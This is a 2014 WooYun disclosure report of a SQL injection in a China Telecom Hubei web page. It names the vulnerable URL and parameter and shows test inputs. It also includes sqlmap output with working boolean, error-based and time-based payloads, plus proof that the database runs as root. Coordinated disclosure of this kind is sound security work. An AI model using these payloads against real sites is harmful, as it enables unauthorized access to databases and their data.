当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082567

漏洞标题:中国电信某站SQL注入一枚

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2014-11-09 17:46

修复时间:2014-12-24 17:48

公开时间:2014-12-24 17:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-09: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经确认,细节仅向厂商公开
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-24: 细节向公众公开

简要描述:

中国电信某站SQL注入一枚

详细说明:


http://my.hb.189.cn/index.php?app=group_check&id=30
http://my.hb.189.cn/index.php?app=group_check&id=30 and 3=3
http://my.hb.189.cn/index.php?app=group_check&id=30 and 3=33
页面显示不一样。
然后。。

1.jpg


MySQL 是 root权限
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=group_check&id=30 AND 2504=2504
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: app=group_check&id=30 AND (SELECT 9755 FROM(SELECT COUNT(*),CONCAT(
0x3a6265613a,(SELECT (CASE WHEN (9755=9755) THEN 1 ELSE 0 END)),0x3a6864733a,FLO
OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: app=group_check&id=30 AND SLEEP(5)
---
[18:45:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.4.25
back-end DBMS: MySQL 5
[18:45:04] [INFO] fetching current user
[18:45:04] [WARNING] reflective value(s) found and filtering out
[18:45:04] [INFO] retrieved: root@%
current user: 'root@%'

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-13 13:41

厂商回复:

最新状态:

暂无